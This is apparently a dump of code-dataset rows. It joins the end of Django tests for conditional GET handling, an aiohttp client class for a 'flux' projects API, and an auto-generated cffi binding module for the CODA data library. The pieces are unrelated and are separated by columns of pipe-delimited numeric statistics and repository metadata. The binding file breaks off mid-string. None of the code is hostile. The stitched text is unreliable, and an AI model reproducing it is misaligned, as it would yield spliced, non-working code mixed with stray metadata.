self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertEqual(response.status_code, 412)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertEqual(response.status_code, 412)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % ETAG
response = self.client.get('/condition/')
self.assertEqual(response.status_code, 412)
def test_single_condition_1(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified/')
self.assertNotModified(response)
response = self.client.get('/condition/etag/')
self.assertFullResponse(response, check_last_modified=False)
def test_single_condition_2(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % ETAG
response = self.client.get('/condition/etag/')
self.assertNotModified(response)
response = self.client.get('/condition/last_modified/')
self.assertFullResponse(response, check_etag=False)
def test_single_condition_3(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified/')
self.assertFullResponse(response, check_etag=False)
def test_single_condition_4(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % EXPIRED_ETAG
response = self.client.get('/condition/etag/')
self.assertFullResponse(response, check_last_modified=False)
def test_single_condition_5(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified2/')
self.assertNotModified(response)
response = self.client.get('/condition/etag2/')
self.assertFullResponse(response, check_last_modified=False)
def test_single_condition_6(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % ETAG
response = self.client.get('/condition/etag2/')
self.assertNotModified(response)
response = self.client.get('/condition/last_modified2/')
self.assertFullResponse(response, check_etag=False)
def test_single_condition_7(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified/')
self.assertEqual(response.status_code, 412)
response = self.client.get('/condition/etag/')
self.assertFullResponse(response, check_last_modified=False)
def test_single_condition_8(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified/')
self.assertFullResponse(response, check_etag=False)
def test_single_condition_9(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/last_modified2/')
self.assertEqual(response.status_code, 412)
response = self.client.get('/condition/etag2/')
self.assertFullResponse(response, check_last_modified=False)
def test_single_condition_head(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.head('/condition/')
self.assertNotModified(response)
def test_invalid_etag(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = r'"\"'
response = self.client.get('/condition/etag/')
self.assertFullResponse(response, check_last_modified=False)
| 46.897436
| 88
| 0.701804
| 1,083
| 9,145
| 5.651893
| 0.102493
| 0.129064
| 0.147035
| 0.143767
| 0.849371
| 0.838262
| 0.819311
| 0.807221
| 0.781898
| 0.755922
| 0
| 0.02193
| 0.177255
| 9,145
| 194
| 89
| 47.139175
| 0.7916
| 0.016184
| 0
| 0.704403
| 0
| 0
| 0.192504
| 0.091415
| 0
| 0
| 0
| 0
| 0.295597
| 1
| 0.125786
| false
| 0
| 0.018868
| 0
| 0.150943
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cd45e09ad6e764c003bebf43e4acdb421f560f2
| 3,922
|
py
|
Python
|
youwol_utils/clients/flux/flux.py
|
youwol/py-youwol
|
85a8877e302c9da1aea168bf1d964d19036c1134
|
[
"MIT"
] | null | null | null |
youwol_utils/clients/flux/flux.py
|
youwol/py-youwol
|
85a8877e302c9da1aea168bf1d964d19036c1134
|
[
"MIT"
] | 1
|
2022-03-14T09:40:15.000Z
|
2022-03-14T09:40:15.000Z
|
youwol_utils/clients/flux/flux.py
|
youwol/py-youwol
|
85a8877e302c9da1aea168bf1d964d19036c1134
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass, field
from typing import Dict
import aiohttp
from youwol_utils.clients.utils import raise_exception_from_response
@dataclass(frozen=True)
class FluxClient:
url_base: str
headers: Dict[str, str] = field(default_factory=lambda: {})
connector = aiohttp.TCPConnector(verify_ssl=False)
async def get_projects(self, **kwargs):
url = f"{self.url_base}/projects"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def create_project(self, body, **kwargs):
url = f"{self.url_base}/projects/create"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def update_project(self, project_id, body, **kwargs):
url = f"{self.url_base}/projects/{project_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def get_project(self, project_id: str, **kwargs):
url = f"{self.url_base}/projects/{project_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def delete_project(self, project_id: str, **kwargs):
url = f"{self.url_base}/projects/{project_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.delete(url=url, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def get_records(self, body, **kwargs):
url = f"{self.url_base}/records"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def update_metadata(self, project_id: str, body, **kwargs):
url = f"{self.url_base}/projects/{project_id}/metadata"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def get_metadata(self, project_id: str, **kwargs):
url = f"{self.url_base}/projects/{project_id}/metadata"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
| 37.711538
| 80
| 0.601989
| 466
| 3,922
| 4.944206
| 0.122318
| 0.0625
| 0.070313
| 0.101563
| 0.851128
| 0.83724
| 0.83724
| 0.824653
| 0.796007
| 0.796007
| 0
| 0.008743
| 0.300102
| 3,922
| 103
| 81
| 38.07767
| 0.830601
| 0
| 0
| 0.712329
| 0
| 0
| 0.071647
| 0.071647
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.054795
| 0
| 0.219178
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b18e2c1e1539bf650f61c76ac9b2ec2050ba80d
| 23,639
|
py
|
Python
|
python/cffi/_codac.py
|
bambang/coda
|
8c9b61e8cd38fd3d95aae4ff71d8e23b4dcfb65d
|
[
"MIT",
"BSD-3-Clause"
] | 1
|
2021-03-12T12:37:38.000Z
|
2021-03-12T12:37:38.000Z
|
python/cffi/_codac.py
|
bambang/coda
|
8c9b61e8cd38fd3d95aae4ff71d8e23b4dcfb65d
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
python/cffi/_codac.py
|
bambang/coda
|
8c9b61e8cd38fd3d95aae4ff71d8e23b4dcfb65d
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
# auto-generated file
import _cffi_backend
ffi = _cffi_backend.FFI('_codac',
_version = 0x2601,
_types = b'\x00\x00\x19\x0D\x00\x00\x01\x0B\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x03\x0B\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x04\x0B\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x05\x0B\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x06\x0B\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x07\x01\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x00\x0F\x00\x01\xE5\x0D\x00\x00\x00\x0F\x00\x00\x32\x0D\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x2D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x01\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x19\x11\x00\x00\x19\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x19\x11\x00\x00\x19\x11\x00\x00\x07\x01\x00\x00\x64\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x19\x11\x00\x01\xE5\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x19\x11\x00\x00\x10\x03\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x02\x1A\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x28\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x02\x0B\x00\x00\x19\x11\x00\x02\x3D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x07\x01\x00\x00\x19\x03\x00\x00\x46\x03\x00\x00\x4A\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x01\x5A\x03\x00\x00\x04\x03\x00\x00\x4F\x11\x00\x00\x4F\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x2E\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x5C\x11\x00\x00\x19\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x5C\x11\x00\x02\x30\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x5C\x11\x00\x00\x07\x01\x00\x00\x6D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x5C\x11\x00\x00\x09\x01\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x2E\x03\x00\x02\x2D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x71\x11\x00\x00\x00\x0B\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x71\x11\x00\x00\x09\x01\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x19\x11\x00\x00\x6D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x28\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x02\x31\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x2D\x11\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x2D\x11\x00\x00\x2D\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x2D\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x56\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x07\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x0A\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x0D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x02\x33\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\xB0\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x32\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x1B\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x02\x34\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\xC6\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x02\x35\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\xCF\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x55\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x02\x36\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\xE1\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\xB0\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\xC6\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\xCF\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\xE1\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x02\x3A\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x02\x3B\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x02\x25\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x02\x3C\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x1F\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x1F\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x25\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x25\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x2B\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x2B\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x31\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x31\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x31\x11\x00\x00\x17\x01\x00\x00\x17\x01\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x2F\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x5C\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x70\x11\x00\x00\x71\x03\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x70\x11\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x70\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x70\x11\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x01\x5E\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x01\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\xC2\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x64\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x64\x11\x00\x00\x19\x11\x00\x00\x09\x01\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x30\x03\x00\x00\x4F\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x8F\x11\x00\x00\x88\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x8F\x11\x00\x00\x56\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x8F\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x8F\x11\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x32\x03\x00\x00\x4F\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x4F\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x19\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x88\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x56\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\xA4\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\xA8\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\xAC\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x32\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x09\x01\x00\x00\x4F\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x09\x01\x00\x00\x88\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x09\x01\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x0E\x01\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x0E\x01\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x0E\x01\x00\x00\x19\x11\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x0E\x01\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x07\x01\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x19\x11\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x00\x0F\x00\x00\x6D\x0D\x00\x00\x07\x01\x00\x00\x69\x11\x00\x00\x09\x01\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x02\x2F\x03\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x00\x0E\x01\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x00\x17\x01\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x00\x18\x01\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x00\x4A\x11\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x00\x00\x0F\x00\x00\x02\x01\x00\x00\x01\x09\x00\x00\x04\x09\x00\x00\x02\x09\x00\x02\x32\x03\x00\x00\x03\x09\x00\x00\x0D\x01\x00\x00\x13\x01\x00\x00\x15\x01\x00\x00\x11\x01\x00\x00\x00\x09\x00\x02\x37\x05\x00\x00\x00\x08\x00\x00\x14\x01\x00\x00\x16\x01\x00\x00\x12\x01\x00\x00\x00\x01',
_globals = (b'\xFF\xFF\xFF\x1FCODA_ERROR_ARRAY_NUM_DIMS_MISMATCH',-106,b'\xFF\xFF\xFF\x1FCODA_ERROR_ARRAY_OUT_OF_BOUNDS',-107,b'\xFF\xFF\xFF\x1FCODA_ERROR_DATA_DEFINITION',-400,b'\xFF\xFF\xFF\x1FCODA_ERROR_EXPRESSION',-401,b'\xFF\xFF\xFF\x1FCODA_ERROR_FILE_NOT_FOUND',-20,b'\xFF\xFF\xFF\x1FCODA_ERROR_FILE_OPEN',-21,b'\xFF\xFF\xFF\x1FCODA_ERROR_FILE_READ',-22,b'\xFF\xFF\xFF\x1FCODA_ERROR_FILE_WRITE',-23,b'\xFF\xFF\xFF\x1FCODA_ERROR_HDF4',-10,b'\xFF\xFF\xFF\x1FCODA_ERROR_HDF5',-12,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_ARGUMENT',-100,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_DATETIME',-104,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_FORMAT',-103,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_INDEX',-101,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_NAME',-102,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_TYPE',-105,b'\xFF\xFF\xFF\x1FCODA_ERROR_NO_HDF4_SUPPORT',-11,b'\xFF\xFF\xFF\x1FCODA_ERROR_NO_HDF5_SUPPORT',-13,b'\xFF\xFF\xFF\x1FCODA_ERROR_NO_PARENT',-108,b'\xFF\xFF\xFF\x1FCODA_ERROR_OUT_OF_BOUNDS_READ',-301,b'\xFF\xFF\xFF\x1FCODA_ERROR_OUT_OF_MEMORY',-1,b'\xFF\xFF\xFF\x1FCODA_ERROR_PRODUCT',-300,b'\xFF\xFF\xFF\x1FCODA_ERROR_UNSUPPORTED_PRODUCT',-200,b'\xFF\xFF\xFF\x1FCODA_ERROR_XML',-14,b'\xFF\xFF\xFF\x1FCODA_MAX_NUM_DIMS',8,b'\xFF\xFF\xFF\x1FCODA_SUCCESS',0,b'\xFF\xFF\xFF\x1FMAX_NUM_DIMS',8,b'\x00\x00\x14\x23coda_MinInf',0,b'\x00\x00\x14\x23coda_NaN',0,b'\x00\x00\x14\x23coda_PlusInf',0,b'\xFF\xFF\xFF\x0Bcoda_array_class',1,b'\xFF\xFF\xFF\x0Bcoda_array_ordering_c',0,b'\xFF\xFF\xFF\x0Bcoda_array_ordering_fortran',1,b'\x00\x02\x14\x23coda_c_index_to_fortran_index',0,b'\x00\x01\x85\x23coda_close',0,b'\x00\x00\xBB\x23coda_cursor_get_array_dim',0,b'\x00\x00\xE8\x23coda_cursor_get_available_union_field_index',0,b'\x00\x00\xD6\x23coda_cursor_get_bit_size',0,b'\x00\x00\xD6\x23coda_cursor_get_byte_size',0,b'\x00\x00\xB7\x23coda_cursor_get_depth',0,b'\x00\x00\xD6\x23coda_cursor_get_file_bit_offset',0,b'\x00\x00\xD6\x23coda_cursor_get_file_byte_offset',0,b'\x00\x00\x9E\x23coda_cursor_get_format',0,b'\x00\x00\xE8\x23coda_cursor_get_index',0,b'\x00\x00\xE8\x23coda_cursor_get_num_elements',0,b'\x00\x00\x82\x23coda_cursor_get_product_file',0,b'\x00\x00\xA2\x23coda_cursor_get_read_type',0,b'\x00\x00\xEC\x23coda_cursor_get_record_field_available_status',0,b'\x00\x00\x7D\x23coda_cursor_get_record_field_index_from_name',0,b'\x00\x00\xA6\x23coda_cursor_get_special_type',0,b'\x00\x00\xE8\x23coda_cursor_get_string_length',0,b'\x00\x00\x86\x23coda_cursor_get_type',0,b'\x00\x00\xAA\x23coda_cursor_get_type_class',0,b'\x00\x00\x5E\x23coda_cursor_goto',0,b'\x00\x00\x66\x23coda_cursor_goto_array_element',0,b'\x00\x00\x6B\x23coda_cursor_goto_array_element_by_index',0,b'\x00\x00\x5B\x23coda_cursor_goto_attributes',0,b'\x00\x00\x5B\x23coda_cursor_goto_available_union_field',0,b'\x00\x00\x5B\x23coda_cursor_goto_first_array_element',0,b'\x00\x00\x5B\x23coda_cursor_goto_first_record_field',0,b'\x00\x00\x5B\x23coda_cursor_goto_next_array_element',0,b'\x00\x00\x5B\x23coda_cursor_goto_next_record_field',0,b'\x00\x00\x5B\x23coda_cursor_goto_parent',0,b'\x00\x00\x6B\x23coda_cursor_goto_record_field_by_index',0,b'\x00\x00\x5E\x23coda_cursor_goto_record_field_by_name',0,b'\x00\x00\x5B\x23coda_cursor_goto_root',0,b'\x00\x00\xB7\x23coda_cursor_has_ascii_content',0,b'\x00\x00\xB7\x23coda_cursor_has_attributes',0,b'\x00\x00\xC0\x23coda_cursor_print_path',0,b'\x00\x01\x57\x23coda_cursor_read_bits',0,b'\x00\x01\x57\x23coda_cursor_read_bytes',0,b'\x00\x00\x6F\x23coda_cursor_read_char',0,b'\x00\x00\x73\x23coda_cursor_read_char_array',0,b'\x00\x00\xF1\x23coda_cursor_read_char_partial_array',0,b'\x00\x00\x8A\x23coda_cursor_read_complex_double_pair',0,b'\x00\x00\x99\x23coda_cursor_read_complex_double_pairs_array',0,b'\x00\x00\x8E\x23coda_cursor_read_complex_double_split',0,b'\x00\x00\x93\x23coda_cursor_read_complex_double_split_array',0,b'\x00\x00\x8A\x23coda_cursor_read_double',0,b'\x00\x00\x99\x23coda_cursor_read_double_array',0,b'\x00\x00\xF7\x23coda_cursor_read_double_partial_array',0,b'\x00\x00\xAE\x23coda_cursor_read_float',0,b'\x00\x00\xB2\x23coda_cursor_read_float_array',0,b'\x00\x00\xFD\x23coda_cursor_read_float_partial_array',0,b'\x00\x00\xC4\x23coda_cursor_read_int16',0,b'\x00\x00\xC8\x23coda_cursor_read_int16_array',0,b'\x00\x01\x03\x23coda_cursor_read_int16_partial_array',0,b'\x00\x00\xCD\x23coda_cursor_read_int32',0,b'\x00\x00\xD1\x23coda_cursor_read_int32_array',0,b'\x00\x01\x09\x23coda_cursor_read_int32_partial_array',0,b'\x00\x00\xD6\x23coda_cursor_read_int64',0,b'\x00\x00\xDA\x23coda_cursor_read_int64_array',0,b'\x00\x01\x0F\x23coda_cursor_read_int64_partial_array',0,b'\x00\x00\xDF\x23coda_cursor_read_int8',0,b'\x00\x00\xE3\x23coda_cursor_read_int8_array',0,b'\x00\x01\x15\x23coda_cursor_read_int8_partial_array',0,b'\x00\x00\x78\x23coda_cursor_read_string',0,b'\x00\x01\x33\x23coda_cursor_read_uint16',0,b'\x00\x01\x37\x23coda_cursor_read_uint16_array',0,b'\x00\x01\x1B\x23coda_cursor_read_uint16_partial_array',0,b'\x00\x01\x3C\x23coda_cursor_read_uint32',0,b'